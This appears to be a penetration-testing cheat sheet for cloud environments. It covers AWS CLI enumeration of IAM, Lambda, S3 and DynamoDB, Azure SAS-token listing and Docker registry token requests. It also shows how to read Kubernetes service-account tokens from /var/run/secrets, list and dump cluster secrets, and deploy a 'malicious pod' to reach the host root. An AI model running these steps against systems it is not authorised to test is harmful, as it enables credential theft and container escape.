aws configure
AWS Access Key ID [None]: key_id
AWS Secret Access Key [None]: access_key
Default region name [None]: eu-west-3
Default output format [None]:
Note: If you have a multiple of account you can specifie your account and your endpoint url with
--profile <profile_name>
and--endpoint-url <url>
.
Example:
aws --profile <profile> --endpoint-url <url> iam list-attached-user-policies --user-name <USERNAME>
aws iam list-attached-user-policies --user-name <USERNAME>
This command will return an object like this:
{
"AttachedPolicies": [
{
"PolicyName": "<POLICY_NAME>",
"PolicyArn": "arn:aws:iam::......:policy/<POLICY_NAME>"
}
],
"IsTruncated": false
}
aws iam get-policy --policy-arn <ARN_POLICY>
aws iam list-user-policies --user-name <USER_NAME>
aws iam get-user-policy --user-name <USER_NAME> --policy-name <POLICY_NAME>
aws lambda list-functions
aws lambda get-function-url-config --function-name <FUNCTION_NAME>
aws s3 documentation aws s3api documentation
aws s3api list-buckets --query "Buckets"
aws s3api list-objects --bucket <BUCKET>
aws s3 ls --recursive s3://<bucket_name>
aws s3 sync s3://<bucket_name> <destination>
aws s3 cp <path_to_file> s3://<bucket_name>
aws dynamodb list-tables
aws dynamodb scan --table-name <table_name>
aws --endpoint-url http://localhost:4566 dynamodb create-table --table-name example \
--attribute-definitions AttributeName=example_attribute,AttributeType=S \
--key-schema AttributeName=example_attribute,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=10, WriteCapacityUnits=5
aws --endpoint-url http://localhost:4566 dynamodb put-item --table-name example \
--item '{"example_attribute":{"S":"Example"}}'
Kubernetes commonly stylized as K8s is an open-source container orchestration system for automating software deployment, scaling, and management. Google originally designed Kubernetes, but the Cloud Native Computing Foundation now maintains the project.
/run/secrets/kubernetes.io/serviceaccount/ca.crt
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/token
kubectl get namespace --server <HOST> --certificate-authority=ca.crt --token=$token
kubectl auth can-i --list --namespace=<NAMESPACES> --server <HOST> --certificate-authority=ca.crt --token=$token
List all secrets:
kubectl get secrets --namespace=<NAMESPACES> --server <HOST> --certificate-authority=ca.crt --token=$token
Get secret:
kubectl describe secret <SECRET-ID> --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token
Get:
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token get pods
Describe:
You can get configuration of specific
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token describe pod <POD_ID>
Apply:
If you have good rights to apply a pod, most of the time you will be able to turn up the volume of the root machine.
You can find an definition of malicious pod here: pwn.yml
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token apply -f pwn.yml
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token exec -it pwn -- bash
curl "http://<account>.blob.core.windows.net/<container>?restype=container&comp=list&se=<SE>&sp=<SP>&sv=<SV>&sr=c&sig=<SIG>%3D"
curl "http://<account>.blob.core.windows.net/<container>/<file_name>?se=<SE>&sp=rl&sv=<SV>&sr=c&sig=<SIG>%3D"
Note %3D is ‘=’ and it’s required
Here you can find more information for query parameters
# script.py
from azure.cosmosdb.table import TableService
table_service = TableService(account_name="...", sas_token='se=<SE>&sp=<SP>&sv=<SV>&tn=<Table>&sig=<SIG>%3D', protocol='http', endpoint_suffix='core.windows.net')
print(table_service.exists('<TABLE>'))
print(list(table_service.query_entities('<TABLE>')))
By default, docker registry run on port 5000. The first step to do is to know if the registry need authentication token or not. You can do this by sending a request to the registry.
curl -I http://<HOST>:5000/v2/
With the header
www-authenticate
you can know if the registry need authentication token or not.
Example of response:
Www-Authenticate: Bearer realm="http://<HOST>:5001/",service="Docker registry",error="invalid_token"
From this response you can try to get a token, the realm is the url to get the token.
Examples of requests:
# Try to get only access on catalog
curl http://<REALM_URL>/auth?scope=registry:catalog:*&service=<NAME_OF_SERVICE>
# Try to get only pull,push right on an image
curl http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:*&service=<NAME_OF_SERVICE>
# Try to get only pull right on an image
curl http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:pull&service=<NAME_OF_SERVICE>
You can get all images names by sending a request to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/_catalog
You can get all tags for an image by sending a request to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/tags/list
You can get image manifest by sending a request to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/manifests/<TAG>
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/blobs/<LAYER>
You can also use an automated tool like DockerRegistryGrabber.